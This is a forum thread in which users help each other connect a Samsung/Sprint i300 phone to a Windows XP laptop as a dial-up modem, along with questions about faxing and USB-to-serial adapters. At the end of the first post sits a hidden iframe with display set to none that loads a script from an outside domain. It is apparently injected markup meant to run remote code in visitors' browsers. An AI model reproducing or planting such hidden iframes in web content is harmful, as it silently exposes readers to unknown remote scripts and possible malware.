+ Reply to Thread

Connecting to a Laptop as Modem

Can someone please direct me to a link for the software and possibly a thread discussing how to do this? I used to have the kyocera brick/palm phone about a year ago and it worked fine, albeit at 14.4. Now that I have the sphi300, I need to connect using my laptop and I can't seem to find software that will do it. I downloaded the dialer version 3.0 and also the pcs connection manager but neither will recognize my phone. They both ask me to connect my phone but don't go any further. Am I supposed to put the phone into data mode?

I'm running Win XP.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

No special software is needed (at least I don't need any). I simply place the phone in the cradle, connect it to the serial port, and use the Windows default dial-up connection software to dial the phone number. Works fine... I'm using XP Pro. Of course, you have to manually add the hardware (modem) into device manager as a standard 14.4 modem and set your dialup connection to use that modem. Sometimes I get an error that it can't open the port but I just redial and it eventually works after 3 or 4 tries max.

I also have no problems using my i300 as a modem, but I also bought a AC510 so I can use my laptop wirelessly and talk on the phone while I am supporting a client. I think the software you may be looking for is the Sprint dialer software (I think v3.0 is the latest). If you log on to Sprint's web site (you actually have to log on with you acct info), there is a download. But, as mentioned here, this is not requried. You have to know what serial port number your cradle or data cable is attached to. Then go into control panel and add a GENERIC modem on COMx. It is slow, but it does work.
    Carl

Great Thanks, I uninstalled the PCS vision software and it started working immediately. Now, how would I recieve a fax thru my i300? Thanks!

To be honest, I don't know about the fax, but if I were you, I'd go to www.efax.com and sign up for a free efax number. Then you can receive faxes all the time, without the need to have your phone ready to receive a fax, and the fax will come to you as an email attachment. If is a nice, free service.
    Carl

Administrator

Arrow

you can also try FAX from Marks/Space. it works very well. there is a thread about it here on the forum...

Fax using notebook

I'm not looking to view/send/receive faxes using my phone as a viewer, I just want to use winfax on my laptop to send/receive faxes. Do I have to use the dialer software? I know that there is a fax mode as well as a data mode on my phone but that's about it.

I300 as a Modem

I need some help....I have the connection cable and I have downloaded Dialer 3.0. My problems start with the fact that my Sony Vaio does not have a serial port. I have a serial to USB adapter. I know my USB is ok because I can use my digital camera just fine. I am running Windows XP Home.

I can not get the computer to see the phone. I have tried using the Dialer software and I have tried to install the modem manually. When I do it manually, it requires a COM port. Does USB even use a COM port? Has anyone got this thing to work with a USB adapter and Windows XP? If so, please give me the steps!!

Thanks for your help...

Administrator

Arrow

there aer several threads on this subject. do a search to read over the others....